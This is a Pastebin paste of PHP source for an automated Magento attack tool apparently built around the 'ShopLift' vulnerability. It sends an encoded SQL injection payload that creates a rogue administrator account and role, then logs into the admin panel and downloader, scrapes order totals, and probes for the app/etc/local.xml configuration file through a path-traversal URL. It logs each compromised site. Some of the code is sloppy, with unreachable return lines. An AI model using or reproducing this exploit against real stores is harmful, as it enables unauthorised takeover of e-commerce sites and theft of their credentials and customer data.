Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- private function LoginDownloader($url){
- $link = parse_url($url);
- $data = $this->CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
- array("username" => $this->username,
- "password" => $this->password)
- );
- if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
- $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
- return "Success\nPermission\t\t: ".$permission;
- $smtp = (!eregi("Smtp",$data) || !eregi("Mandrill",$data) || !eregi("smtp",$data) ? "Smtp Look" : "Ga Ada Smtp");
- return "Success\nSmtpPro\t\t: ".$smtp;
- $filesystem = (!eregi("File_System",$data) ? "File System Ada" : "No");
- return "Success\nFile system\t\t: ".$filesystem;
- } else {
- return "Failed";
- }
- }
- private function LoginAdmin($target){
- $link = parse_url($target);
- $get = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]));
- $key = $this->GetStr("<input name=\"form_key\" type=\"hidden\" value=\"","\" />",$get);
- $data = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]),
- array("login[username]" => $this->username,
- "login[password]" => $this->password,
- "form_key" => $key)
- );
- if($this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]))){
- return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data)."\nInstaled\t\t:".$this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]));
- } else {
- return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data);
- }
- }
- private function ShopLiftExploit($target){
- $email = substr(md5(time()),2,15);
- $link = parse_url($target);
- $data = $this->CurlPost(sprintf("%s://%s/admin/Cms_Wysiwyg/directive/index/",$link["scheme"],$link["host"]),
- array("filter" => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{$this->password}') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','{$email}@telekpitekwashere.cok','{$this->username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{$this->username}'),'Firstname');"),
- "___directive" => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
- "forwarded" => "1")
- );
- return (@imagecreatefromstring($data) !== false);
- }
- private function ExecuteExploit($victim){
- $file = fopen("ShopLift-".date("d-m-Y").".log","a");
- $url = parse_url($victim);
- $target = (!isset($url["scheme"]) ? "http://".$victim : $url["scheme"]."://".$url["host"]);
- if($this->ShopLiftExploit($target)){
- $downloader = $this->LoginDownloader($target);
- $admin = $this->LoginAdmin($target);
- $result = "\n============[ShopLift Result]============\nSite\t\t\t: {$target}\nLogin Admin\t\t: {$admin}\nLogin Downloader\t: {$downloader}\n===========================================\n";
- fwrite($file,$result);
- return $result;
- }else {
- return "[".date("H:i:s")."] ".$target." => Not vuln !\n";
- }
- fclose($file);
- }
- private function LocalFileDiscloure($target){
- $path = array( "/app/etc/local.xml",
- "/magmi/web/download_file.php?file=../../app/etc/local.xml"
- );
- for($i=0;$i<=count($path);$i++){
- $test = $this->CurlPost($target.$path[$i]);
- if(isset($test) && preg_match('/install/i',$test) && preg_match('/date/i',$test)){
- return $this->GetStr("<date><![CDATA[","]]></date>",$test);
- } else {
- return false;
- }
- }
- }
Add Comment
Please, Sign In to add comment